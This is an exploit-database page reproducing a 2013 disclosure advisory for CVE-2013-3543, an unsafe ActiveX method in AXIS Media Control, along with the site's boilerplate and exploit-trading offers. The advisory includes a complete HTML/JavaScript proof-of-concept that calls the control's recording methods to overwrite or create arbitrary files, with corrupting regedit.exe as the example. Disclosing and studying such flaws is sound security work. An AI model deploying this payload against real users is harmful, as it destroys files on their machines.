0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method
1.Advisory Information Title: AXIS Media Control ActiveX vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description A vulnerability has been found in this devices: -CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618) 3.Affected Products CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012) 4.PoC 4.1.Exposed Unsafe ActiveX Method - File Corruption. In the vendor web, you could see that “AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer.” Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. The vulnerability exists due to the ActiveX control including insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user. In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods: When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage: The following code could be used to test the vulnerability: _____________________________________________________________________________ <html> <head> <title></title> <script language="javaScript" type="text/javascript"> function startRecord(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; MyActiveX.StartRecord(theFile); } function saveCurrentImage(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; var theFormat = 1; MyActiveX.SaveCurrentImage(theFormat, theFile); } function startRecordMedia(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; var theFlags = 1; var theMediaTypes = "default" MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes); } </script> </head> <body> <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480"> <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg"> <param name="MediaType" value="mjpeg"> <param name="Volume" value="1"> <param name="ShowStatusBar" value="1"> <param name="ShowToolbar" value="1"> <param name="AutoStart" value="1"> <param name="UIMode" value="ptz-relative"> <param name="MediaType" value="mjpeg-unicast"> <param name="StretchToFit" value="0"> < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> </object> <br> <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()"> <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()"> <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()"> </body> </html> _____________________________________________________________________________ 5.Credits -CVE-2013-3543 was discovered by Javier Repiso Sánchez. 6.Report Timeline -2013-05-24: Students team notifies the Axis Customer Support of the vulnerability -2013-05-24: Axis team asks for a report with technical information. -2013-05-26: Technical details sent to Axis. -2013-05-27: Axis team reports to the technical support to analyze the vulnerability. # 0day.today [2024-12-25] #